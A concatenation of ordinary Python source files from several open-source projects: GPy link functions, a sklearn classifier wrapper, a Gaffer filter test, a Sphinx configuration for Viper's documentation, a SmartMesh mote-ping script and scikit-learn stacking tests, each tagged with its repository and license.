f2 = safe_square(f)
return -1./f2
def d2transf_df2(self, f):
f3 = safe_cube(f)
return 2./f3
def d3transf_df3(self,f):
f4 = safe_quad(f)
return -6./f4
class Heaviside(GPTransformation):
"""
.. math::
g(f) = I_{x \\geq 0}
"""
def transf(self,f):
#transformation goes here
return np.where(f>0, 1, 0)
def dtransf_df(self,f):
raise NotImplementedError("This function is not differentiable!")
def d2transf_df2(self,f):
raise NotImplementedError("This function is not differentiable!")
| befelix/GPy | GPy/likelihoods/link_functions.py | Python | bsd-3-clause | 4,850 |
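A standalone sketch (independent of GPy) checking the Cloglog derivatives above numerically: transf(f) = 1 - exp(-exp(f)), so its first derivative is exp(f - exp(f)), as returned by dtransf_df.

```python
# Central-difference check of Cloglog.dtransf_df on a small grid.
import numpy as np

f = np.linspace(-2.0, 2.0, 9)
transf = lambda v: 1.0 - np.exp(-np.exp(v))
analytic = np.exp(f - np.exp(f))                  # matches dtransf_df above
eps = 1e-6
numeric = (transf(f + eps) - transf(f - eps)) / (2 * eps)
print(np.allclose(analytic, numeric, atol=1e-6))  # expected: True
```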
"""Base classes for classifiers"""
from ..core.classes import Processor
class BaseClassifier(Processor):
'''
The base class for classifiers.
'''
def __init__(self, *args, **kwargs):
super(BaseClassifier, self).__init__(*args, **kwargs)
self.classifier = None
class SklearnClassifier(BaseClassifier):
'''
A class wrapping sklearn classifiers.
'''
#The sklearn classifier
classifier_class = None
def __init__(self, *args, **kwargs):
        super(SklearnClassifier, self).__init__(*args, **kwargs)
self.init_classifier(*args, **kwargs)
def init_classifier(self, *args, **kwargs):
'''
Init sklearn classifier.
'''
self.classifier = self.classifier_class(*args, **kwargs)
def run_classifier(self, caller, *args, **kwargs):
pass
def run(self, caller, *args, **kwargs):
return self.run_classifier(caller, *args, **kwargs)
def __getattr__(self, attr):
        '''Propagate attribute search to the wrapped sklearn classifier.'''
        try:
            return self.__dict__[attr]
        except KeyError:
            return getattr(self.classifier, attr)
| Succeed-Together/bakfu | classify/base.py | Python | bsd-3-clause | 1,167 |
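SklearnClassifier above is meant to be specialised by pointing classifier_class at a concrete sklearn estimator; a hypothetical subclass might look like the following (the bakfu import path and the subclass name are assumptions, not part of the original file):

```python
# Hypothetical specialisation; assumes the module above is importable as bakfu.classify.base.
from sklearn.naive_bayes import MultinomialNB

from bakfu.classify.base import SklearnClassifier


class NaiveBayesClassifier(SklearnClassifier):
    '''Wraps sklearn's MultinomialNB behind the bakfu Processor interface.'''
    classifier_class = MultinomialNB
```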
##########################################################################
#
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of Image Engine Design nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import IECore
import Gaffer
import GafferImage
import os
class FilterTest( unittest.TestCase ) :
def testDefaultFilter( self ) :
filters = GafferImage.Filter.filters()
default = GafferImage.Filter.defaultFilter()
self.assertTrue( default in filters )
def testFilterList( self ) :
filters = GafferImage.Filter.filters()
self.assertTrue( len(filters) == 9 )
self.assertTrue( "Box" in filters )
self.assertTrue( "BSpline" in filters )
self.assertTrue( "Bilinear" in filters )
self.assertTrue( "Hermite" in filters )
self.assertTrue( "Mitchell" in filters )
self.assertTrue( "CatmullRom" in filters )
self.assertTrue( "Cubic" in filters )
self.assertTrue( "Lanczos" in filters )
self.assertTrue( "Sinc" in filters )
def testCreators( self ) :
filters = GafferImage.Filter.filters()
for name in filters :
f = GafferImage.Filter.create( name )
			self.assertEqual( f.typeName(), name+"Filter" )
| cedriclaunay/gaffer | python/GafferImageTest/FilterTest.py | Python | bsd-3-clause | 2,759 |
# -*- coding: utf-8 -*-
#
# Viper documentation build configuration file, created by
# sphinx-quickstart on Mon May 5 18:24:15 2014.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Viper'
copyright = u'2014, Claudio Guarnieri'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.1'
# The full version, including alpha/beta/rc tags.
release = '1.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'Viperdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'Viper.tex', u'Viper Documentation',
u'Claudio Guarnieri', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'viper', u'Viper Documentation',
[u'Claudio Guarnieri'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'Viper', u'Viper Documentation',
u'Claudio Guarnieri', 'Viper', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
| LMSlay/wiper | docs/source/conf.py | Python | bsd-3-clause | 7,714 |
#!/usr/bin/python
'''
This script sends a ping to a specific mote and waits for the pingResponse
notification. If any other pingResponses are received, the program
continues listening and waits until the correct one is received.
'''
#============================ adjust path =====================================
import sys
import os
if __name__ == "__main__":
here = sys.path[0]
sys.path.insert(0, os.path.join(here, '..', 'libs'))
sys.path.insert(0, os.path.join(here, '..', 'external_libs'))
#============================ imports =========================================
import urllib3
import threading
import traceback
import time
import certifi
# generic SmartMeshSDK imports
from SmartMeshSDK import sdk_version
# VManager-specific imports
from VManagerSDK.vmanager import Configuration
from VManagerSDK.vmgrapi import VManagerApi
from VManagerSDK.vmanager.rest import ApiException
#============================ defines =========================================
DFLT_MGR_HOST = "127.0.0.1"
DFLT_MOTE_MAC = "00-17-0D-00-00-60-08-DC"
urllib3.disable_warnings() # disable warnings that show up about self-signed certificates
#============================ variables =======================================
mote_exists = False
stop_event = threading.Event()
#============================ helpers =========================================
def process_event(mydata):
global macaddr, myresponse, stop_event
if macaddr == mydata.mac_address and myresponse.callback_id == mydata.callback_id:
print '\nPing response from mote {0} with callbackID = {1}'.format(mydata.mac_address, mydata.callback_id)
print ' returned with result --> {0}'.format(mydata.result)
print ' date and time --> {0}'.format(mydata.sys_time)
print ' latency of response --> {0} mSec'.format(mydata.latency)
print ' mote at hop --> {0}'.format(mydata.hop_count)
print ' mote voltage reading = {0} v, and temperature = {1} C'.format(mydata.voltage, mydata.temperature)
stop_event.set()
else:
print ('\nReceived a ping response, but either different mote or wrong callbackID... still waiting --> {0} , {1}\n'.format(mydata.mac_address, mydata.callback_id))
def process_notif(notif):
'''
Dispatch notifications to specific processing functions.
'''
    if notif.type in ('pingResponse',):
# handle ping response notifications
process_event(notif)
else:
# handle other event notifications
pass
#============================ main ============================================
try:
# print banner
print '\nVMgr_SendPing (c) Dust Networks'
print 'SmartMesh SDK {0}\n'.format('.'.join([str(i) for i in sdk_version.VERSION]))
mgrhost = raw_input('Enter the IP address of the manager (e.g. {0}): '.format(DFLT_MGR_HOST))
if mgrhost == "":
mgrhost = DFLT_MGR_HOST
macaddr = raw_input('Enter MAC address of mote to Ping (e.g. {0}): '.format(DFLT_MOTE_MAC))
if macaddr == "":
macaddr = DFLT_MOTE_MAC
macaddr = macaddr.upper() # make sure all letters are upper case
# log in as user "dust"
config = Configuration()
config.username = 'dust'
config.password = 'dust'
config.verify_ssl = False
if os.path.isfile(certifi.where()):
config.ssl_ca_cert = certifi.where()
else:
config.ssl_ca_cert = os.path.join(os.path.dirname(sys.executable), "cacert.pem")
# initialize the VManager Python library
voyager = VManagerApi(host=mgrhost)
# first test that the mote does exist and is operational
print '\n==== Verifying that the mote requested is in network and Operational'
mote_list = voyager.motesApi.get_motes()
for mote in mote_list.motes:
if mote.mac_address == macaddr and mote.state == "operational":
mote_exists = True
if mote_exists:
print '\n==== Sending Ping to the mote and wait for the response'
# start listening for data notifications
voyager.get_notifications('events', notif_callback=process_notif)
# send a ping to the mote
myresponse = voyager.motesApi.ping_mote(macaddr)
print ' Ping sent to mote {0}, callback = {1}'.format(macaddr, myresponse.callback_id)
# wait for the pingNotification response and then exit the program
print '\n Waiting for the pingResponse notification'
stop_event.wait()
voyager.stop_notifications()
print '\nScript ended normally'
else:
print '\n This MAC address is not joined to this network'
except:
traceback.print_exc()
print ('Script ended with an error.')
sys.exit()
| realms-team/solmanager | libs/smartmeshsdk-REL-1.3.0.1/vmanager_apps/VMgr_SendPing.py | Python | bsd-3-clause | 4,789 |
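The ping script above blocks its main thread on stop_event until the notification callback fires on a background thread; a standalone sketch of that Event handshake (the timer simply stands in for the asynchronous pingResponse callback):

```python
# Sketch of the wait/set pattern used around get_notifications()/process_event().
import threading

stop_event = threading.Event()

def fake_notification():
    # stands in for process_event() running on the notification thread
    stop_event.set()

threading.Timer(0.5, fake_notification).start()   # simulate an asynchronous callback
stop_event.wait()                                  # main thread blocks here
print('notification received, continuing')
```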
"""Test the stacking classifier and regressor."""
# Authors: Guillaume Lemaitre <g.lemaitre58@gmail.com>
# License: BSD 3 clause
import pytest
import numpy as np
import scipy.sparse as sparse
from sklearn.base import BaseEstimator
from sklearn.base import ClassifierMixin
from sklearn.base import RegressorMixin
from sklearn.base import clone
from sklearn.exceptions import ConvergenceWarning
from sklearn.datasets import load_iris
from sklearn.datasets import load_diabetes
from sklearn.datasets import load_breast_cancer
from sklearn.datasets import make_regression
from sklearn.datasets import make_classification
from sklearn.dummy import DummyClassifier
from sklearn.dummy import DummyRegressor
from sklearn.linear_model import LogisticRegression
from sklearn.linear_model import LinearRegression
from sklearn.svm import LinearSVC
from sklearn.svm import LinearSVR
from sklearn.svm import SVC
from sklearn.tree import DecisionTreeClassifier
from sklearn.tree import DecisionTreeRegressor
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import RandomForestRegressor
from sklearn.preprocessing import scale
from sklearn.ensemble import StackingClassifier
from sklearn.ensemble import StackingRegressor
from sklearn.model_selection import train_test_split
from sklearn.model_selection import StratifiedKFold
from sklearn.model_selection import KFold
from sklearn.utils._mocking import CheckingClassifier
from sklearn.utils._testing import assert_allclose
from sklearn.utils._testing import assert_allclose_dense_sparse
from sklearn.utils._testing import ignore_warnings
from sklearn.utils.estimator_checks import check_estimator
from sklearn.utils.estimator_checks import check_no_attributes_set_in_init
X_diabetes, y_diabetes = load_diabetes(return_X_y=True)
X_iris, y_iris = load_iris(return_X_y=True)
@pytest.mark.parametrize(
"cv", [3, StratifiedKFold(n_splits=3, shuffle=True, random_state=42)]
)
@pytest.mark.parametrize(
"final_estimator", [None, RandomForestClassifier(random_state=42)]
)
@pytest.mark.parametrize("passthrough", [False, True])
def test_stacking_classifier_iris(cv, final_estimator, passthrough):
# prescale the data to avoid convergence warning without using a pipeline
# for later assert
X_train, X_test, y_train, y_test = train_test_split(
scale(X_iris), y_iris, stratify=y_iris, random_state=42
)
estimators = [('lr', LogisticRegression()), ('svc', LinearSVC())]
clf = StackingClassifier(
estimators=estimators, final_estimator=final_estimator, cv=cv,
passthrough=passthrough
)
clf.fit(X_train, y_train)
clf.predict(X_test)
clf.predict_proba(X_test)
assert clf.score(X_test, y_test) > 0.8
X_trans = clf.transform(X_test)
expected_column_count = 10 if passthrough else 6
assert X_trans.shape[1] == expected_column_count
if passthrough:
assert_allclose(X_test, X_trans[:, -4:])
clf.set_params(lr='drop')
clf.fit(X_train, y_train)
clf.predict(X_test)
clf.predict_proba(X_test)
if final_estimator is None:
# LogisticRegression has decision_function method
clf.decision_function(X_test)
X_trans = clf.transform(X_test)
expected_column_count_drop = 7 if passthrough else 3
assert X_trans.shape[1] == expected_column_count_drop
if passthrough:
assert_allclose(X_test, X_trans[:, -4:])
def test_stacking_classifier_drop_column_binary_classification():
# check that a column is dropped in binary classification
X, y = load_breast_cancer(return_X_y=True)
X_train, X_test, y_train, _ = train_test_split(
scale(X), y, stratify=y, random_state=42
)
# both classifiers implement 'predict_proba' and will both drop one column
estimators = [('lr', LogisticRegression()),
('rf', RandomForestClassifier(random_state=42))]
clf = StackingClassifier(estimators=estimators, cv=3)
clf.fit(X_train, y_train)
X_trans = clf.transform(X_test)
assert X_trans.shape[1] == 2
# LinearSVC does not implement 'predict_proba' and will not drop one column
estimators = [('lr', LogisticRegression()), ('svc', LinearSVC())]
clf.set_params(estimators=estimators)
clf.fit(X_train, y_train)
X_trans = clf.transform(X_test)
assert X_trans.shape[1] == 2
def test_stacking_classifier_drop_estimator():
# prescale the data to avoid convergence warning without using a pipeline
# for later assert
X_train, X_test, y_train, _ = train_test_split(
scale(X_iris), y_iris, stratify=y_iris, random_state=42
)
estimators = [('lr', 'drop'), ('svc', LinearSVC(random_state=0))]
rf = RandomForestClassifier(n_estimators=10, random_state=42)
clf = StackingClassifier(
estimators=[('svc', LinearSVC(random_state=0))],
final_estimator=rf, cv=5
)
clf_drop = StackingClassifier(
estimators=estimators, final_estimator=rf, cv=5
)
clf.fit(X_train, y_train)
clf_drop.fit(X_train, y_train)
assert_allclose(clf.predict(X_test), clf_drop.predict(X_test))
assert_allclose(clf.predict_proba(X_test), clf_drop.predict_proba(X_test))
assert_allclose(clf.transform(X_test), clf_drop.transform(X_test))
def test_stacking_regressor_drop_estimator():
# prescale the data to avoid convergence warning without using a pipeline
# for later assert
X_train, X_test, y_train, _ = train_test_split(
scale(X_diabetes), y_diabetes, random_state=42
)
estimators = [('lr', 'drop'), ('svr', LinearSVR(random_state=0))]
rf = RandomForestRegressor(n_estimators=10, random_state=42)
reg = StackingRegressor(
estimators=[('svr', LinearSVR(random_state=0))],
final_estimator=rf, cv=5
)
reg_drop = StackingRegressor(
estimators=estimators, final_estimator=rf, cv=5
)
reg.fit(X_train, y_train)
reg_drop.fit(X_train, y_train)
assert_allclose(reg.predict(X_test), reg_drop.predict(X_test))
assert_allclose(reg.transform(X_test), reg_drop.transform(X_test))
@pytest.mark.parametrize(
"cv", [3, KFold(n_splits=3, shuffle=True, random_state=42)]
)
@pytest.mark.parametrize(
"final_estimator, predict_params",
[(None, {}),
(RandomForestRegressor(random_state=42), {}),
(DummyRegressor(), {'return_std': True})]
)
@pytest.mark.parametrize("passthrough", [False, True])
def test_stacking_regressor_diabetes(cv, final_estimator, predict_params,
passthrough):
# prescale the data to avoid convergence warning without using a pipeline
# for later assert
X_train, X_test, y_train, _ = train_test_split(
scale(X_diabetes), y_diabetes, random_state=42
)
estimators = [('lr', LinearRegression()), ('svr', LinearSVR())]
reg = StackingRegressor(
estimators=estimators, final_estimator=final_estimator, cv=cv,
passthrough=passthrough
)
reg.fit(X_train, y_train)
result = reg.predict(X_test, **predict_params)
expected_result_length = 2 if predict_params else 1
if predict_params:
assert len(result) == expected_result_length
X_trans = reg.transform(X_test)
expected_column_count = 12 if passthrough else 2
assert X_trans.shape[1] == expected_column_count
if passthrough:
assert_allclose(X_test, X_trans[:, -10:])
reg.set_params(lr='drop')
reg.fit(X_train, y_train)
reg.predict(X_test)
X_trans = reg.transform(X_test)
expected_column_count_drop = 11 if passthrough else 1
assert X_trans.shape[1] == expected_column_count_drop
if passthrough:
assert_allclose(X_test, X_trans[:, -10:])
@pytest.mark.parametrize('fmt', ['csc', 'csr', 'coo'])
def test_stacking_regressor_sparse_passthrough(fmt):
# Check passthrough behavior on a sparse X matrix
X_train, X_test, y_train, _ = train_test_split(
sparse.coo_matrix(scale(X_diabetes)).asformat(fmt),
y_diabetes, random_state=42
)
estimators = [('lr', LinearRegression()), ('svr', LinearSVR())]
rf = RandomForestRegressor(n_estimators=10, random_state=42)
clf = StackingRegressor(
estimators=estimators, final_estimator=rf, cv=5, passthrough=True
)
clf.fit(X_train, y_train)
X_trans = clf.transform(X_test)
assert_allclose_dense_sparse(X_test, X_trans[:, -10:])
assert sparse.issparse(X_trans)
assert X_test.format == X_trans.format
@pytest.mark.parametrize('fmt', ['csc', 'csr', 'coo'])
def test_stacking_classifier_sparse_passthrough(fmt):
# Check passthrough behavior on a sparse X matrix
X_train, X_test, y_train, _ = train_test_split(
sparse.coo_matrix(scale(X_iris)).asformat(fmt),
y_iris, random_state=42
)
estimators = [('lr', LogisticRegression()), ('svc', LinearSVC())]
rf = RandomForestClassifier(n_estimators=10, random_state=42)
clf = StackingClassifier(
estimators=estimators, final_estimator=rf, cv=5, passthrough=True
)
clf.fit(X_train, y_train)
X_trans = clf.transform(X_test)
assert_allclose_dense_sparse(X_test, X_trans[:, -4:])
assert sparse.issparse(X_trans)
assert X_test.format == X_trans.format
def test_stacking_classifier_drop_binary_prob():
# check that classifier will drop one of the probability column for
# binary classification problem
# Select only the 2 first classes
X_, y_ = scale(X_iris[:100]), y_iris[:100]
estimators = [
('lr', LogisticRegression()), ('rf', RandomForestClassifier())
]
clf = StackingClassifier(estimators=estimators)
clf.fit(X_, y_)
X_meta = clf.transform(X_)
assert X_meta.shape[1] == 2
class NoWeightRegressor(RegressorMixin, BaseEstimator):
def fit(self, X, y):
self.reg = DummyRegressor()
return self.reg.fit(X, y)
def predict(self, X):
return np.ones(X.shape[0])
class NoWeightClassifier(ClassifierMixin, BaseEstimator):
def fit(self, X, y):
self.clf = DummyClassifier(strategy='stratified')
return self.clf.fit(X, y)
@pytest.mark.parametrize(
"y, params, type_err, msg_err",
[(y_iris,
{'estimators': None},
ValueError, "Invalid 'estimators' attribute,"),
(y_iris,
{'estimators': []},
ValueError, "Invalid 'estimators' attribute,"),
(y_iris,
{'estimators': [('lr', LogisticRegression()),
('svm', SVC(max_iter=5e4))],
'stack_method': 'predict_proba'},
ValueError, 'does not implement the method predict_proba'),
(y_iris,
{'estimators': [('lr', LogisticRegression()),
('cor', NoWeightClassifier())]},
TypeError, 'does not support sample weight'),
(y_iris,
{'estimators': [('lr', LogisticRegression()),
('cor', LinearSVC(max_iter=5e4))],
'final_estimator': NoWeightClassifier()},
TypeError, 'does not support sample weight')]
)
def test_stacking_classifier_error(y, params, type_err, msg_err):
with pytest.raises(type_err, match=msg_err):
clf = StackingClassifier(**params, cv=3)
clf.fit(
scale(X_iris), y, sample_weight=np.ones(X_iris.shape[0])
)
@pytest.mark.parametrize(
"y, params, type_err, msg_err",
[(y_diabetes,
{'estimators': None},
ValueError, "Invalid 'estimators' attribute,"),
(y_diabetes,
{'estimators': []},
ValueError, "Invalid 'estimators' attribute,"),
(y_diabetes,
{'estimators': [('lr', LinearRegression()),
('cor', NoWeightRegressor())]},
TypeError, 'does not support sample weight'),
(y_diabetes,
{'estimators': [('lr', LinearRegression()),
('cor', LinearSVR())],
'final_estimator': NoWeightRegressor()},
TypeError, 'does not support sample weight')]
)
def test_stacking_regressor_error(y, params, type_err, msg_err):
with pytest.raises(type_err, match=msg_err):
reg = StackingRegressor(**params, cv=3)
reg.fit(
scale(X_diabetes), y, sample_weight=np.ones(X_diabetes.shape[0])
)
@pytest.mark.parametrize(
"estimator, X, y",
[(StackingClassifier(
estimators=[('lr', LogisticRegression(random_state=0)),
('svm', LinearSVC(random_state=0))]),
X_iris[:100], y_iris[:100]), # keep only classes 0 and 1
(StackingRegressor(
estimators=[('lr', LinearRegression()),
('svm', LinearSVR(random_state=0))]),
X_diabetes, y_diabetes)],
ids=['StackingClassifier', 'StackingRegressor']
)
def test_stacking_randomness(estimator, X, y):
# checking that fixing the random state of the CV will lead to the same
# results
estimator_full = clone(estimator)
estimator_full.set_params(
cv=KFold(shuffle=True, random_state=np.random.RandomState(0))
)
estimator_drop = clone(estimator)
estimator_drop.set_params(lr='drop')
estimator_drop.set_params(
cv=KFold(shuffle=True, random_state=np.random.RandomState(0))
)
assert_allclose(
estimator_full.fit(X, y).transform(X)[:, 1:],
estimator_drop.fit(X, y).transform(X)
)
# These warnings are raised due to _BaseComposition
@pytest.mark.filterwarnings("ignore:TypeError occurred during set_params")
@pytest.mark.filterwarnings("ignore:Estimator's parameters changed after")
@pytest.mark.parametrize(
"estimator",
[StackingClassifier(
estimators=[('lr', LogisticRegression(random_state=0)),
('tree', DecisionTreeClassifier(random_state=0))]),
StackingRegressor(
estimators=[('lr', LinearRegression()),
('tree', DecisionTreeRegressor(random_state=0))])],
ids=['StackingClassifier', 'StackingRegressor']
)
def test_check_estimators_stacking_estimator(estimator):
check_estimator(estimator)
check_no_attributes_set_in_init(estimator.__class__.__name__, estimator)
def test_stacking_classifier_stratify_default():
# check that we stratify the classes for the default CV
clf = StackingClassifier(
estimators=[('lr', LogisticRegression(max_iter=1e4)),
('svm', LinearSVC(max_iter=1e4))]
)
# since iris is not shuffled, a simple k-fold would not contain the
# 3 classes during training
clf.fit(X_iris, y_iris)
@pytest.mark.parametrize(
"stacker, X, y",
[(StackingClassifier(
estimators=[('lr', LogisticRegression()),
('svm', LinearSVC(random_state=42))],
final_estimator=LogisticRegression(),
cv=KFold(shuffle=True, random_state=42)),
*load_breast_cancer(return_X_y=True)),
(StackingRegressor(
estimators=[('lr', LinearRegression()),
('svm', LinearSVR(random_state=42))],
final_estimator=LinearRegression(),
cv=KFold(shuffle=True, random_state=42)),
X_diabetes, y_diabetes)],
ids=['StackingClassifier', 'StackingRegressor']
)
def test_stacking_with_sample_weight(stacker, X, y):
    # check that sample weights have an influence on the fitting
    # note: ConvergenceWarnings are caught since we are not worried about
    # convergence here
n_half_samples = len(y) // 2
total_sample_weight = np.array(
[0.1] * n_half_samples + [0.9] * (len(y) - n_half_samples)
)
X_train, X_test, y_train, _, sample_weight_train, _ = train_test_split(
X, y, total_sample_weight, random_state=42
)
with ignore_warnings(category=ConvergenceWarning):
stacker.fit(X_train, y_train)
y_pred_no_weight = stacker.predict(X_test)
with ignore_warnings(category=ConvergenceWarning):
stacker.fit(X_train, y_train, sample_weight=np.ones(y_train.shape))
y_pred_unit_weight = stacker.predict(X_test)
assert_allclose(y_pred_no_weight, y_pred_unit_weight)
with ignore_warnings(category=ConvergenceWarning):
stacker.fit(X_train, y_train, sample_weight=sample_weight_train)
y_pred_biased = stacker.predict(X_test)
assert np.abs(y_pred_no_weight - y_pred_biased).sum() > 0
def test_stacking_classifier_sample_weight_fit_param():
# check sample_weight is passed to all invocations of fit
stacker = StackingClassifier(
estimators=[
('lr', CheckingClassifier(expected_fit_params=['sample_weight']))
],
final_estimator=CheckingClassifier(
expected_fit_params=['sample_weight']
)
)
stacker.fit(X_iris, y_iris, sample_weight=np.ones(X_iris.shape[0]))
@pytest.mark.filterwarnings("ignore::sklearn.exceptions.ConvergenceWarning")
@pytest.mark.parametrize(
"stacker, X, y",
[(StackingClassifier(
estimators=[('lr', LogisticRegression()),
('svm', LinearSVC(random_state=42))],
final_estimator=LogisticRegression()),
*load_breast_cancer(return_X_y=True)),
(StackingRegressor(
estimators=[('lr', LinearRegression()),
('svm', LinearSVR(random_state=42))],
final_estimator=LinearRegression()),
X_diabetes, y_diabetes)],
ids=['StackingClassifier', 'StackingRegressor']
)
def test_stacking_cv_influence(stacker, X, y):
# check that the stacking affects the fit of the final estimator but not
# the fit of the base estimators
    # note: ConvergenceWarnings are caught since we are not worried about
    # convergence here
stacker_cv_3 = clone(stacker)
stacker_cv_5 = clone(stacker)
stacker_cv_3.set_params(cv=3)
stacker_cv_5.set_params(cv=5)
stacker_cv_3.fit(X, y)
stacker_cv_5.fit(X, y)
# the base estimators should be identical
for est_cv_3, est_cv_5 in zip(stacker_cv_3.estimators_,
stacker_cv_5.estimators_):
assert_allclose(est_cv_3.coef_, est_cv_5.coef_)
# the final estimator should be different
with pytest.raises(AssertionError, match='Not equal'):
assert_allclose(stacker_cv_3.final_estimator_.coef_,
stacker_cv_5.final_estimator_.coef_)
@pytest.mark.parametrize("make_dataset, Stacking, Estimator", [
(make_classification, StackingClassifier, LogisticRegression),
(make_regression, StackingRegressor, LinearRegression)
])
def test_stacking_without_n_features_in(make_dataset, Stacking, Estimator):
# Stacking supports estimators without `n_features_in_`. Regression test
# for #17353
class MyEstimator(Estimator):
"""Estimator without n_features_in_"""
def fit(self, X, y):
super().fit(X, y)
del self.n_features_in_
X, y = make_dataset(random_state=0, n_samples=100)
stacker = Stacking(estimators=[('lr', MyEstimator())])
msg = f"{Stacking.__name__} object has no attribute n_features_in_"
with pytest.raises(AttributeError, match=msg):
stacker.n_features_in_
# Does not raise
stacker.fit(X, y)
msg = "'MyEstimator' object has no attribute 'n_features_in_'"
